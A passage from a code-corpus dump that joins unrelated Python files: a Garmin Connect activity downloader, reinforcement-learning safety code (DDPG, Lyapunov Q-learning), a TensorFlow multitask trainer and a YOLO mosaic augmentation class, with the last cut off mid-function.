x[c * aug_size + j, 2, :, :] = x[c * aug_size + j, 0, :, :]
c += 1
mu = x.mean()
sd = x.std()
x = (x - mu) / sd
trainset = TensorDataset(x, y)
aug_size = 3
num_data = len(df_test)
x = t.zeros((num_data * aug_size, 3, img_size, img_size))
y = t.zeros((num_data * aug_size, 1))
c = 0
for i, row in df_test.iterrows():
id = int(row.id)
for j in range(aug_size):
im = imread(path.join(dir, f'{id:.0f}.{j}.png'))
x[c * aug_size + j, 0, :, :] = t.from_numpy(im)
y[c * aug_size + j][0] = row.malignancy_th
x[c * aug_size + j, 1, :, :] = x[c * aug_size + j, 0, :, :]
x[c * aug_size + j, 2, :, :] = x[c * aug_size + j, 0, :, :]
c += 1
x = (x - mu) / sd
testset = TensorDataset(x, y)
return trainset, testset
if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
generate_dataset(sys.argv[1])
else:
print("run \"python3 preprocessing.py <path to output directory>\"")
``` |
{
"source": "62north/garminexport",
"score": 3
} |
#### File: garminexport/cli/get_activity.py
```python
import argparse
import getpass
import logging
import os
from datetime import timedelta
import dateutil.parser
import garminexport.backup
from garminexport.garminclient import GarminClient
from garminexport.logging_config import LOG_LEVELS
from garminexport.retryer import Retryer, ExponentialBackoffDelayStrategy, MaxRetriesStopStrategy
logging.basicConfig(level=logging.INFO, format="%(asctime)-15s [%(levelname)s] %(message)s")
log = logging.getLogger(__name__)
def main():
parser = argparse.ArgumentParser(
description="Downloads one particular activity for a given Garmin Connect account.")
# positional args
parser.add_argument(
"username", metavar="<username>", type=str, help="Account user name.")
parser.add_argument(
"activity", metavar="<activity>", type=int, help="Activity ID.")
parser.add_argument(
"format", metavar="<format>", type=str,
help="Export format (one of: {}).".format(garminexport.backup.supported_export_formats))
# optional args
parser.add_argument(
"--password", type=str, help="Account password.")
parser.add_argument(
"--destination", metavar="DIR", type=str,
help="Destination directory for downloaded activity. Default: ./activities/",
default=os.path.join(".", "activities"))
parser.add_argument(
"--log-level", metavar="LEVEL", type=str,
help="Desired log output level (DEBUG, INFO, WARNING, ERROR). Default: INFO.",
default="INFO")
args = parser.parse_args()
if args.log_level not in LOG_LEVELS:
raise ValueError("Illegal log-level argument: {}".format(args.log_level))
if args.format not in garminexport.backup.supported_export_formats:
raise ValueError(
"Unrecognized export format: '{}'. Must be one of {}".format(
args.format, garminexport.backup.supported_export_formats))
logging.root.setLevel(LOG_LEVELS[args.log_level])
try:
if not os.path.isdir(args.destination):
os.makedirs(args.destination)
if not args.password:
args.password = <PASSWORD>("Enter password: ")
with GarminClient(args.username, args.password) as client:
log.info("fetching activity %s ...", args.activity)
summary = client.get_activity_summary(args.activity)
# set up a retryer that will handle retries of failed activity downloads
retryer = Retryer(
delay_strategy=ExponentialBackoffDelayStrategy(initial_delay=timedelta(seconds=1)),
stop_strategy=MaxRetriesStopStrategy(5))
start_time = dateutil.parser.parse(summary["summaryDTO"]["startTimeGMT"])
garminexport.backup.download(
client, (args.activity, start_time), retryer, args.destination, export_formats=[args.format])
except Exception as e:
log.error("failed with exception: %s", e)
raise
``` |
{
"source": "62subinh/deeprl_safety_specification",
"score": 2
} |
#### File: lyapunov_reachability/common/gradient.py
```python
import torch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def flat_grad(grads):
grad_flatten = []
for grad in grads:
grad_flatten.append(grad.view(-1))
grad_flatten = torch.cat(grad_flatten)
return grad_flatten
def flat_hessian(hessians):
hessians_flatten = []
for hessian in hessians:
hessians_flatten.append(hessian.contiguous().view(-1))
hessians_flatten = torch.cat(hessians_flatten).data
return hessians_flatten
def kl_divergence(new_actor, old_actor, obs, deterministic=True):
if deterministic:
mu = new_actor(obs)
mu_old = old_actor(obs)
mu_old = mu_old.detach()
kl = (mu_old - mu).pow(2) / 2.0
return kl.sum(1, keepdim=True)
else:
mu, std = new_actor(obs)
mu_old, std_old = old_actor(obs)
mu_old = mu_old.detach()
std_old = std_old.detach()
# kl divergence between old policy and new policy : D( pi_old || pi_new )
# pi_old -> mu_old, std_old / pi_new -> mu, std
# be careful of calculating KL-divergence. It is not symmetric metric.
kl = torch.log(std / std_old) + (std_old.pow(2) + (mu_old - mu).pow(2)) / (2.0 * std.pow(2)) - 0.5
return kl.sum(1, keepdim=True)
def hessian_vector_product(new_actor, old_actor, obs, p, cg_damping=1e-1):
p.detach()
kl = kl_divergence(new_actor=new_actor, old_actor=old_actor, obs=obs)
kl = kl.mean()
kl_grad = torch.autograd.grad(kl, new_actor.parameters(), create_graph=True)
kl_grad = flat_grad(kl_grad)
kl_grad_p = (kl_grad * p).sum()
kl_hessian = torch.autograd.grad(kl_grad_p, new_actor.parameters())
kl_hessian = flat_hessian(kl_hessian)
return kl_hessian + p * cg_damping
# from openai baseline code
# https://github.com/openai/baselines/blob/master/baselines/common/cg.py
def conjugate_gradient(actor, target_actor, obs, b, nsteps=10, residual_tol=1e-10):
x = torch.zeros(b.size(), device=device)
r = b.clone()
p = b.clone()
rdotr = torch.dot(r, r)
for i in range(nsteps):
Ap = hessian_vector_product(actor, target_actor, obs, p, cg_damping=1e-1)
alpha = rdotr / torch.dot(p, Ap)
x += alpha * p
r -= alpha * Ap
new_rdotr = torch.dot(r, r)
betta = new_rdotr / rdotr
p = r + betta * p
rdotr = new_rdotr
if rdotr < residual_tol:
break
return x
```
#### File: lyapunov_reachability/speculation_ddpg/ddpg.py
```python
import os
import pickle
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from lyapunov_reachability.speculation_ddpg.base import ContinuousBase
from lyapunov_reachability.common.utils import init_weights
from lyapunov_reachability.common.models import *
# if gpu is to be used
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class OUNoise:
def __init__(self, action_size, theta, mu, sigma):
self.action_size = action_size
self.theta = theta
self.mu = mu
self.sigma = sigma
self.X = np.zeros(self.action_size)
def sample(self):
dx = self.theta * (self.mu - self.X) + self.sigma * np.random.randn(len(self.X))
self.X = self.X + dx
return self.X
class SimpleDDPG(ContinuousBase):
def __init__(
self, env, confidence, extractor=None, extractor_params=None, decoder=None, decoder_params=None,
seed=None, lr=1e-3, batch_size=128, gamma=0.999, ob_resize=32, grid_points=21, strict_done=False,
buffer_size=int(1e5), polyak=1e-3, noise_theta=0.15, noise_mu=0., noise_sigma=0.3, gradient_clip=(0.5, 1.0),
lr_ratio=0.1, re_init=False, save_dir='../../simple-ddpg'):
# Neural networks
self.actor = None
self.critic = None
self.target_actor = None
self.target_critic = None
# Optimizers
self.actor_optimizer = None
self.critic_optimizer = None
# Noise generator
self.ou_noise = OUNoise(len(env.action_space.low), noise_theta, noise_mu, noise_sigma)
# Parameters
self.polyak = polyak # Soft target update
self.gradient_clip = gradient_clip # (clip_critic, clip_actor)
self.lr_ratio = lr_ratio # actor_lr = critic_lr * lr_ratio
super(SimpleDDPG, self).__init__(
env, confidence, extractor, extractor_params, decoder, decoder_params, seed, lr, batch_size, gamma,
ob_resize, grid_points, strict_done, buffer_size, None, None, re_init, save_dir)
self.act_high = self.env.action_space.high
self.act_low = self.env.action_space.low
def setup_model(self, extractor=None, extractor_params=None, decoder=None, decoder_params=None):
"""
actor: Marginally safe policy.
critic: Reachability value function w.r.t. the actor.
"""
# model_ = Cnn
# params_ = {'channels_': [16, 32, 32], 'kernel_sizes_': [5, 5, 5], 'strides_': [2, 2, 2],}
self.critic = ProbCritic(self.ob_space, self.ac_space, extractor, extractor_params,
decoder=decoder, decoder_params=decoder_params)
self.actor = DetActor(self.ob_space, self.ac_space, extractor, extractor_params,
decoder=decoder, decoder_params=decoder_params)
self.target_critic = ProbCritic(self.ob_space, self.ac_space, extractor, extractor_params,
decoder=decoder, decoder_params=decoder_params)
self.target_actor = DetActor(self.ob_space, self.ac_space, extractor, extractor_params,
decoder=decoder, decoder_params=decoder_params)
def setup_optimizer(self, reload=False, baseline_dir=None, baseline_step=None):
if reload:
print("Check if you called agent.load_weights(load_dir)!")
elif baseline_dir or baseline_step is None:
init_weights(self.critic)
init_weights(self.actor)
self.hard_target_update()
else:
raise RuntimeError("Baseline training is not supported.")
self.hard_target_update()
self.critic.cuda(device)
self.actor.cuda(device)
self.target_actor.cuda(device)
self.target_critic.cuda(device)
self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=self.lr)
self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=self.lr*self.lr_ratio)
def update_network(self, *args):
"""
For more information, see
(a) https://lilianweng.github.io/lil-log/2018/04/08/policy-gradient-algorithms.html.
(b) https://github.com/dongminlee94/Samsung-DRL-Code/tree/master/3_A2C_DDPG
:param obs_t: Observation at time t.
:param act_t: Action taken at time t, drawn from exploratory policy.
:param obs_tp1: Observation at time t+1.
:param reached: 1. (True) if the agent ever reached target at time interval (0, t].
:param done: 1. (True) if obs_t is the final state of the trajectory.
"""
try:
obs_t, act_t, obs_tp1, reached, done = self._draw_batch()
except ValueError:
return
# Get q-value.
q_t = self.critic(obs_t, act_t).squeeze(1)
# Get target q.
act_tp1 = self.target_actor(obs_tp1)
q_tp1 = self.target_critic(obs_tp1, act_tp1).squeeze(1)
q_t_target = (1. - reached) * (1. - done) * (self.gamma * q_tp1) + reached
critic_loss = F.mse_loss(q_t, q_t_target)
self.critic_optimizer.zero_grad()
critic_loss.backward()
nn.utils.clip_grad_norm_(self.critic.parameters(), self.gradient_clip[0])
self.critic_optimizer.step()
# Get actor
actor_a_t = self.actor(obs_t)
actor_loss = self.critic(obs_t, actor_a_t).mean()
self.actor_optimizer.zero_grad()
actor_loss.backward()
nn.utils.clip_grad_norm_(self.actor.parameters(), self.gradient_clip[1])
self.actor_optimizer.step()
def step(self, obs, *args):
pre_act = self.actor(self.transform(obs).unsqueeze(0).to(device)).detach()
act = pre_act.data.cpu().numpy()[0] + self.ou_noise.sample()
act = np.clip(act, -1., 1.)
# Denormalize action before apply it to env.
return (act + 1.) * 0.5 * (self.act_high - self.act_low) + self.act_low
def verify_state(self, obs):
with torch.no_grad():
obs_b = self.transform(obs).unsqueeze(0).to(device)
act_b = self.actor(obs_b)
reachability = self.critic(obs_b, act_b)
return reachability.data.cpu().numpy()[0]
def target_update(self):
self.soft_target_update()
def hard_target_update(self):
for target_param, param in zip(self.target_critic.parameters(), self.critic.parameters()):
target_param.data.copy_(param.data)
for target_param, param in zip(self.target_actor.parameters(), self.actor.parameters()):
target_param.data.copy_(param.data)
def soft_target_update(self):
for target_param, param in zip(self.target_critic.parameters(), self.critic.parameters()):
target_param.data.copy_(param.data * self.polyak + target_param.data * (1.0 - self.polyak))
for target_param, param in zip(self.target_actor.parameters(), self.actor.parameters()):
target_param.data.copy_(param.data * self.polyak + target_param.data * (1.0 - self.polyak))
def save_setup(self, extractor, extractor_params, decoder, decoder_params, save_env=False):
if save_env:
with open(os.path.join(self.save_dir, 'env.pkl'), 'wb') as f:
pickle.dump(self.env, f)
data = {
"confidence": self.confidence,
"extractor": extractor.__name__,
"extractor_params": extractor_params,
"decoder": None if decoder is None else decoder.__name__,
"decoder_params": decoder_params,
"seed": self.seed,
"lr": self.lr,
"batch_size": self.batch_size,
"gamma": self.gamma,
"ob_resize": self.ob_space[-1],
"grid_points": self.grid_points,
"strict_done": self.strict_done,
"buffer_size": self.replay.buffer_size,
"polyak": self.polyak,
"noise_theta": self.ou_noise.theta,
"noise_mu": self.ou_noise.mu,
"noise_sigma": self.ou_noise.sigma,
"gradient_clip": self.gradient_clip,
"lr_ratio": self.lr_ratio
}
with open(os.path.join(self.save_dir, "params.pkl".format(self.steps)), 'wb') as f:
pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)
def save_weights(self):
torch.save(self.critic.state_dict(), os.path.join(self.save_dir, "{}-critic".format(self.steps)))
torch.save(self.actor.state_dict(), os.path.join(self.save_dir, "{}-actor".format(self.steps)))
def load_weights(self, load_dir):
self.critic.load_state_dict(torch.load(os.path.join(load_dir, "{}-critic".format(self.steps))))
self.actor.load_state_dict(torch.load(os.path.join(load_dir, "{}-actor".format(self.steps))))
self.critic.eval()
self.actor.eval()
self.hard_target_update()
if __name__ == '__main__':
from classic_envs.pendulum import VanillaPendulumEnv
from lyapunov_reachability.common.networks import Mlp, Cnn
grid_points = 31
episode_length = 300
confidence = 0.8
gamma = 0.9999
strict_done = True
env = VanillaPendulumEnv()
name = '{}-pendulum'.format(int(episode_length))
steps = int(5e6)
log_interval = int(1e4)
save_interval = int(1e5)
# Create & train
ddpg = SimpleDDPG(
env, confidence, extractor=Mlp, extractor_params={'channels_': [400, 300], 'activ': 'tanh'}, seed=1234,
gamma=gamma, grid_points=grid_points, strict_done=strict_done, save_dir=os.path.join(name, 'ddpg-initial'))
ddpg.run(steps, episode_length, log_interval=log_interval, save_interval=save_interval, )
```
#### File: lyapunov_reachability/speculation_tabular/lyapunov.py
```python
import os.path
import numpy as np
from lyapunov_reachability.speculation_tabular.base import QBase
import cplex
from cplex.exceptions import CplexSolverError
class LyapunovQAgent(QBase):
def __init__(
self, env, confidence, nb_states, nb_actions, initial_policy, terminal_states, seed=None, strict_done=True,
safe_init=False, baseline_dir=None, baseline_step=None, save_dir='../../spec-tb-lyapunov'):
self.operative_q = np.ones((nb_states, nb_actions))
self.operative_q[terminal_states] = 0.
self.time_q = np.zeros((nb_states, nb_actions))
self.lyapunov_q = self.operative_q * 1.
self.auxiliary_cost = 0.
super(LyapunovQAgent, self).__init__(
env, confidence, nb_states, nb_actions, initial_policy, terminal_states, seed=seed, strict_done=strict_done,
safe_init=safe_init, baseline_dir=baseline_dir, baseline_step=baseline_step, save_dir=save_dir)
def load_baseline(self, baseline):
data = np.load(baseline)
self.reachability_q[:] = data['reachability_q']
self.updates_q[:] = data['updates_q']
if 'policy' in data.keys():
self.policy = data['policy']
else:
safest_reachability = np.min(self.reachability_q, axis=-1, keepdims=True)
self.policy[:] = (self.reachability_q - safest_reachability == 0.) * 1.
self.policy[:] = self.policy / np.sum(self.policy, axis=-1, keepdims=True)
self.operative_q[:] = data['reachability_q']
def save_model(self, path):
info = dict()
info['policy'] = self.policy
info['steps'] = self.steps
# Q learning-specific properties
info['reachability_q'] = self.reachability_q
info['updates_q'] = self.updates_q
info['operative_q'] = self.operative_q
info['time_q'] = self.time_q
info['lyapunov_q'] = self.lyapunov_q
# Other values...
info['auxiliary_cost'] = self.auxiliary_cost
np.savez(path + '.npz', **info)
def load_model(self, load_dir):
data = np.load(os.path.join(load_dir, '{}.npz'.format(self.steps)))
self.reachability_q = data['reachability_q']
self.updates_q = data['updates_q']
self.operative_q = data['operative_q']
self.time_q = data['time_q']
self.lyapunov_q = data['lyapunov_q']
self.auxiliary_cost = data['auxiliary_cost']
def step(self, state, **kwargs):
try:
action = np.random.choice(self.nb_actions, 1, p=self.policy[state, :])[0]
if kwargs.get('epsilon', 0.) > np.random.rand():
action = self.env.action_space.sample()
if np.min(self.reachability_q[state, :]) > 1. - self.confidence:
action = np.argmin(self.reachability_q[state, :])
return action
except ValueError:
print("Error: stochastic policy is not feasible. Policy=\t" + str(self.policy[state, :]))
def extra_setup(self, steps, episode_length, improve_interval, log_interval, save_interval, **kwargs):
self.time_q[:] = episode_length
def _log_auxiliary(self, **kwargs):
return
def _iteration(self, t, state, action, next_state, safety, done, **kwargs):
improve_interval = kwargs.get('improve_interval', 1)
lr = kwargs.get('learning_rate', 1.)
gamma = kwargs.get('gamma', .99)
criterion = kwargs.get('criterion', 1e2)
# Approximate the Q-functions ---------------------------------------------------------------------------------
self.updates_q[state, action] += 1.
_lr = lr / (0.99 + 0.01 * self.updates_q[state, action])
if safety == 0.:
self.reachability_q[state, :] = 1.
self.operative_q[state, :] = 1.
else:
self.reachability_q[state, action] =\
(1. - _lr) * self.reachability_q[state, action] +\
_lr * gamma * np.min(self.reachability_q[next_state, :]) * (1. - done)
self.operative_q[state, action] =\
(1. - _lr) * self.operative_q[state, action] +\
_lr * gamma * np.sum(self.operative_q[next_state, :] * self.policy[next_state, :]) * (1. - done)
self.time_q[state, action] =\
(1. - _lr) * self.time_q[state, action] +\
_lr * (1. + np.sum(self.time_q[next_state, :] * self.policy[next_state, :])) * (1. - done)
# Improve the policy ------------------------------------------------------------------------------------------
if t % improve_interval == 0:
convergence_mask = np.min(self.updates_q, -1) > criterion
self.updates_q[convergence_mask] *= 0.
self._policy_improvement(1. * convergence_mask)
return
def _policy_improvement(self, convergence_mask):
converged_states = np.where(convergence_mask > 0.)[0]
_operative_v = np.sum(self.operative_q * self.policy, -1)
_operative_t = np.sum(self.time_q * self.policy, -1)
try:
_max_reachability = np.max(_operative_v[_operative_v <= 1. - self.confidence])
except ValueError:
_max_reachability = 1. - self.confidence
epsilon = ((1. - self.confidence) - _max_reachability) / np.max(_operative_t)
_lyapunov_q = self.operative_q + self.time_q * epsilon
invalid_indices = np.isnan(_lyapunov_q)
valid_indices = ~invalid_indices
self.lyapunov_q[valid_indices] = _lyapunov_q[valid_indices]
self.lyapunov_q[invalid_indices] = self.operative_q[invalid_indices]
c = cplex.Cplex()
c.set_log_stream(None)
c.set_error_stream(None)
c.set_warning_stream(None)
c.set_results_stream(None)
# for state in converged_states:
for state in range(self.nb_states):
c.variables.delete()
c.linear_constraints.delete()
# Objective: Minimize pi(*|x) * Q_L(x,*) for each x. *Get the safest*
# Bounds: pi(a|x) >= 0 for all a (same as default setting)
obj = self.lyapunov_q[state, :] - np.min(self.lyapunov_q[state, :])
lb = [0.0] * self.nb_actions
indices = list(c.variables.add(obj=list(obj), lb=lb))
# Subject to: (1) sum(pi(*|x)) == 1, (2) pi(*|x) * Q_L(x,*) <= L(x)
# (2) is inequality, (1) is equality constraint. ("L")
A = [cplex.SparsePair(indices[:], [1.] * self.nb_actions)]
b = [1.]
senses = ["E"]
# (2) only applies when the state is safe.
A.append(cplex.SparsePair(indices[:], list(self.lyapunov_q[state, :])))
b.append(np.sum(self.lyapunov_q[state, :] * self.policy[state, :]) + epsilon)
senses.append("L")
c.linear_constraints.add(lin_expr=A, senses=senses, rhs=b)
try:
c.solve()
_answer = np.array(c.solution.get_values())
if np.sum(_answer) == 1. and np.sum(_answer > 1.) == 0 and np.sum(_answer < 0.) == 0:
self.policy[state, :] = _answer
except CplexSolverError:
print("Error: unable to find feasible policy at [state ID: %d]." % state)
return
``` |
{
"source": "62theories/tf-flask",
"score": 2
} |
#### File: modeling/multitask/base_trainer.py
```python
from typing import Union
import gin
import orbit
import tensorflow as tf
from official.modeling.multitask import base_model
from official.modeling.multitask import multitask
@gin.configurable
class MultiTaskBaseTrainer(orbit.StandardTrainer):
"""Multitask base trainer."""
def __init__(self,
multi_task: multitask.MultiTask,
multi_task_model: Union[tf.keras.Model,
base_model.MultiTaskBaseModel],
optimizer: tf.optimizers.Optimizer,
trainer_options=None,
train_datasets=None):
self._strategy = tf.distribute.get_strategy()
self._multi_task = multi_task
self._multi_task_model = multi_task_model
self._optimizer = optimizer
self._training_losses = None
self._training_metrics = None
self._global_step = orbit.utils.create_global_step()
if hasattr(self.multi_task_model, "checkpoint_items"):
checkpoint_items = self.multi_task_model.checkpoint_items
else:
checkpoint_items = {}
self._checkpoint = tf.train.Checkpoint(
model=self.multi_task_model,
optimizer=self.optimizer,
global_step=self.global_step,
**checkpoint_items)
if train_datasets is None:
train_datasets = {}
for name, task in self.multi_task.tasks.items():
train_datasets[name] = orbit.utils.make_distributed_dataset(
self.strategy, task.build_inputs, task.task_config.train_data)
super().__init__(
train_dataset=train_datasets,
options=trainer_options or orbit.StandardTrainerOptions())
def train_loop_begin(self):
"""Clean up states that hold losses and metrics."""
for _, train_loss_metric in self.training_losses.items():
train_loss_metric.reset_states()
for _, metrics in self.training_metrics.items():
for metric in metrics:
metric.reset_states()
def train_loop_end(self):
"""Record loss and metric values per task."""
result = {}
for task_name, loss in self.training_losses.items():
result[task_name] = {loss.name: loss.result()}
for task_name, task_metrics in self.training_metrics.items():
result[task_name].update(
{metric.name: metric.result() for metric in task_metrics})
# Note that, the learning rate schedule is managed by the keras optimizer
# internally, which respects the number of backward pass as `iterations`.
# The learning rate schedule does not follow the trainer logical global
# step of multiple tasks.
if callable(self.optimizer.learning_rate):
result["learning_rate"] = self.optimizer.learning_rate(
self.optimizer.iterations)
else:
result["learning_rate"] = self.optimizer.learning_rate
return result
@property
def checkpoint(self):
"""Accesses the training checkpoint."""
return self._checkpoint
@property
def training_losses(self):
"""Access training loss metric objects for all tasks."""
if self._training_losses is None:
# Builds the per-task metrics and losses.
# This the total summed training loss of tasks in the joint training.
self._training_losses = dict(
total_loss=tf.keras.metrics.Mean("training_loss", dtype=tf.float32))
for name in self.multi_task.tasks:
self._training_losses[name] = tf.keras.metrics.Mean(
"training_loss", dtype=tf.float32)
return self._training_losses
@property
def training_metrics(self):
"""Access training metric metric objects for all tasks."""
if self._training_metrics is None:
# Builds the per-task metrics and losses.
self._training_metrics = {}
for name, task in self.multi_task.tasks.items():
self._training_metrics[name] = task.build_metrics(training=True)
return self._training_metrics
@property
def strategy(self):
return self._strategy
@property
def multi_task(self):
return self._multi_task
@property
def multi_task_model(self):
return self._multi_task_model
@property
def optimizer(self):
return self._optimizer
@property
def global_step(self):
return self._global_step
def train_step(self, iterator_map):
"""The default train step calling the multi-task train step.
Args:
iterator_map: a dictionary of task names and per-task dataset iterators.
"""
def step_fn(inputs):
losses = self.multi_task.joint_train_step(
inputs,
multi_task_model=self.multi_task_model,
optimizer=self.optimizer,
task_metrics=self.training_metrics)
for key, loss in losses.items():
self.training_losses[key].update_state(loss)
self.strategy.run(
step_fn, args=(tf.nest.map_structure(next, iterator_map),))
self.global_step.assign_add(1)
```
#### File: yolo/ops/mosaic.py
```python
import random
import tensorflow as tf
import tensorflow_addons as tfa
from official.vision.beta.ops import box_ops
from official.vision.beta.ops import preprocess_ops
from official.vision.beta.projects.yolo.ops import preprocessing_ops
class Mosaic:
"""Stitch together sets of 4 images to generate samples with more boxes."""
def __init__(self,
output_size,
mosaic_frequency=1.0,
mixup_frequency=0.0,
letter_box=True,
jitter=0.0,
mosaic_crop_mode='scale',
mosaic_center=0.25,
aug_scale_min=1.0,
aug_scale_max=1.0,
aug_rand_angle=0.0,
aug_rand_perspective=0.0,
aug_rand_translate=0.0,
random_pad=False,
random_flip=False,
area_thresh=0.1,
pad_value=preprocessing_ops.PAD_VALUE,
seed=None):
"""Initializes parameters for mosaic.
Args:
output_size: `Tensor` or `List` for [height, width] of output image.
mosaic_frequency: `float` indicating how often to apply mosaic.
mixup_frequency: `float` indicating how often to apply mixup.
letter_box: `boolean` indicating whether upon start of the datapipeline
regardless of the preprocessing ops that are used, the aspect ratio of
the images should be preserved.
jitter: `float` for the maximum change in aspect ratio expected in each
preprocessing step.
mosaic_crop_mode: `str` the type of mosaic to apply. The options are
{crop, scale, None}, crop will construct a mosaic by slicing images
togther, scale will create a mosaic by concatnating and shifting the
image, and None will default to scale and apply no post processing to
the created mosaic.
mosaic_center: `float` indicating how much to randomly deviate from the
from the center of the image when creating a mosaic.
aug_scale_min: `float` indicating the minimum scaling value for image
scale jitter.
aug_scale_max: `float` indicating the maximum scaling value for image
scale jitter.
aug_rand_angle: `float` indicating the maximum angle value for angle.
angle will be changes between 0 and value.
aug_rand_perspective: `float` ranging from 0.000 to 0.001 indicating how
much to prespective warp the image.
aug_rand_translate: `float` ranging from 0 to 1 indicating the maximum
amount to randomly translate an image.
random_pad: `bool` indiccating wether to use padding to apply random
translation true for darknet yolo false for scaled yolo.
random_flip: `bool` whether or not to random flip the image.
area_thresh: `float` for the minimum area of a box to allow to pass
through for optimization.
pad_value: `int` padding value.
seed: `int` the seed for random number generation.
"""
self._output_size = output_size
self._area_thresh = area_thresh
self._mosaic_frequency = mosaic_frequency
self._mixup_frequency = mixup_frequency
self._letter_box = letter_box
self._random_crop = jitter
self._mosaic_crop_mode = mosaic_crop_mode
self._mosaic_center = mosaic_center
self._aug_scale_min = aug_scale_min
self._aug_scale_max = aug_scale_max
self._random_pad = random_pad
self._aug_rand_translate = aug_rand_translate
self._aug_rand_angle = aug_rand_angle
self._aug_rand_perspective = aug_rand_perspective
self._random_flip = random_flip
self._pad_value = pad_value
self._deterministic = seed is not None
self._seed = seed if seed is not None else random.randint(0, 2**30)
def _generate_cut(self):
"""Generate a random center to use for slicing and patching the images."""
if self._mosaic_crop_mode == 'crop':
min_offset = self._mosaic_center
cut_x = preprocessing_ops.random_uniform_strong(
self._output_size[1] * min_offset,
self._output_size[1] * (1 - min_offset),
seed=self._seed)
cut_y = preprocessing_ops.random_uniform_strong(
self._output_size[0] * min_offset,
self._output_size[0] * (1 - min_offset),
seed=self._seed)
cut = [cut_y, cut_x]
ishape = tf.convert_to_tensor(
[self._output_size[0], self._output_size[1], 3])
else:
cut = None
ishape = tf.convert_to_tensor(
[self._output_size[0] * 2, self._output_size[1] * 2, 3])
return cut, ishape
def scale_boxes(self, patch, ishape, boxes, classes, xs, ys):
"""Scale and translate the boxes for each image prior to patching."""
xs = tf.cast(xs, boxes.dtype)
ys = tf.cast(ys, boxes.dtype)
pshape = tf.cast(tf.shape(patch), boxes.dtype)
ishape = tf.cast(ishape, boxes.dtype)
translate = tf.cast((ishape - pshape), boxes.dtype)
boxes = box_ops.denormalize_boxes(boxes, pshape[:2])
boxes = boxes + tf.cast([
translate[0] * ys, translate[1] * xs, translate[0] * ys,
translate[1] * xs
], boxes.dtype)
boxes = box_ops.normalize_boxes(boxes, ishape[:2])
return boxes, classes
def _select_ind(self, inds, *args):
items = []
for item in args:
items.append(tf.gather(item, inds))
return items
def _augment_image(self,
image,
boxes,
classes,
is_crowd,
area,
xs=0.0,
ys=0.0,
cut=None):
"""Process a single image prior to the application of patching."""
if self._random_flip:
# Randomly flip the image horizontally.
image, boxes, _ = preprocess_ops.random_horizontal_flip(
image, boxes, seed=self._seed)
# Augment the image without resizing
image, infos, crop_points = preprocessing_ops.resize_and_jitter_image(
image, [self._output_size[0], self._output_size[1]],
random_pad=False,
letter_box=self._letter_box,
jitter=self._random_crop,
shiftx=xs,
shifty=ys,
cut=cut,
seed=self._seed)
# Clip and clean boxes.
boxes, inds = preprocessing_ops.transform_and_clip_boxes(
boxes,
infos,
area_thresh=self._area_thresh,
shuffle_boxes=False,
augment=True,
seed=self._seed)
classes, is_crowd, area = self._select_ind(inds, classes, is_crowd, area) # pylint:disable=unbalanced-tuple-unpacking
return image, boxes, classes, is_crowd, area, crop_points
def _mosaic_crop_image(self, image, boxes, classes, is_crowd, area):
"""Process a patched image in preperation for final output."""
if self._mosaic_crop_mode != 'crop':
shape = tf.cast(preprocessing_ops.get_image_shape(image), tf.float32)
center = shape * self._mosaic_center
# shift the center of the image by applying a translation to the whole
# image
ch = tf.math.round(
preprocessing_ops.random_uniform_strong(
-center[0], center[0], seed=self._seed))
cw = tf.math.round(
preprocessing_ops.random_uniform_strong(
-center[1], center[1], seed=self._seed))
# clip the boxes to those with in the image
image = tfa.image.translate(image, [cw, ch], fill_value=self._pad_value)
boxes = box_ops.denormalize_boxes(boxes, shape[:2])
boxes = boxes + tf.cast([ch, cw, ch, cw], boxes.dtype)
boxes = box_ops.clip_boxes(boxes, shape[:2])
inds = box_ops.get_non_empty_box_indices(boxes)
boxes = box_ops.normalize_boxes(boxes, shape[:2])
boxes, classes, is_crowd, area = self._select_ind(inds, boxes, classes, # pylint:disable=unbalanced-tuple-unpacking
is_crowd, area)
# warp and scale the fully stitched sample
image, _, affine = preprocessing_ops.affine_warp_image(
image, [self._output_size[0], self._output_size[1]],
scale_min=self._aug_scale_min,
scale_max=self._aug_scale_max,
translate=self._aug_rand_translate,
degrees=self._aug_rand_angle,
perspective=self._aug_rand_perspective,
random_pad=self._random_pad,
seed=self._seed)
height, width = self._output_size[0], self._output_size[1]
image = tf.image.resize(image, (height, width))
# clip and clean boxes
boxes, inds = preprocessing_ops.transform_and_clip_boxes(
boxes,
None,
affine=affine,
area_thresh=self._area_thresh,
seed=self._seed)
classes, is_crowd, area = self._select_ind(inds, classes, is_crowd, area) # pylint:disable=unbalanced-tuple-unpacking
return image, boxes, classes, is_crowd, area, area
# mosaic full frequency doubles model speed
def _process_image(self, sample, shiftx, shifty, cut, ishape):
"""Process and augment each image."""
(image, boxes, classes, is_crowd, area, crop_points) = self._augment_image(
sample['image'], sample['groundtruth_boxes'],
sample['groundtruth_classes'], sample['groundtruth_is_crowd'],
sample['groundtruth_area'], shiftx, shifty, cut)
(boxes, classes) = self.scale_boxes(image, ishape, boxes, classes,
1 - shiftx, 1 - shifty)
sample['image'] = image
sample['groundtruth_boxes'] = boxes
sample['groundtruth_classes'] = classes
sample['groundtruth_is_crowd'] = is_crowd
sample['groundtruth_area'] = area
sample['shiftx'] = shiftx
sample['shifty'] = shifty
sample['crop_points'] = crop_points
return sample
def _patch2(self, one, two):
"""Stitch together 2 images in totality."""
sample = one
sample['image'] = tf.concat([one['image'], two['image']], axis=-2)
sample['groundtruth_boxes'] = tf.concat(
[one['groundtruth_boxes'], two['groundtruth_boxes']], axis=0)
sample['groundtruth_classes'] = tf.concat(
[one['groundtruth_classes'], two['groundtruth_classes']], axis=0)
sample['groundtruth_is_crowd'] = tf.concat(
[one['groundtruth_is_crowd'], two['groundtruth_is_crowd']], axis=0)
sample['groundtruth_area'] = tf.concat(
[one['groundtruth_area'], two['groundtruth_area']], axis=0)
return sample
def _patch(self, one, two):
"""Build the full 4 patch of images from sets of 2 images."""
image = tf.concat([one['image'], two['image']], axis=-3)
boxes = tf.concat([one['groundtruth_boxes'], two['groundtruth_boxes']],
axis=0)
classes = tf.concat(
[one['groundtruth_classes'], two['groundtruth_classes']], axis=0)
is_crowd = tf.concat(
[one['groundtruth_is_crowd'], two['groundtruth_is_crowd']], axis=0)
area = tf.concat([one['groundtruth_area'], two['groundtruth_area']], axis=0)
